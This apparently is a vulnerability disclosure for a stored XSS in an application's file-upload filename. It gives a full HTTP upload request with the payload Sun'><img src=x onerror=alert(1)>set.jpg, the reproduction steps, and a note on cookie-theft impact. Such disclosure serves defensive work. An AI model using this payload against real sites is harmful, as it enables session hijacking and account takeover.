Description

Stored XSS in FileName allows for arbitrary execution of JavaScript

Proof of Concept

// PoC Request
POST /files/ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------82050748222730013181475300839
Content-Length: 71559
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/files/
Cookie: textwrapon=false; textautoformat=false; wysiwyg=textarea
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="responder"

upload
-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg

ÿØÿàJFIF

``ÿí
-----------------------------82050748222730013181475300839--

Step to reproduce

At Menu choose Tools > Files

Upload File with Filename contain payload: Sun'><img src=x onerror=alert(1)>set.jpg

Video PoC: PoC

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.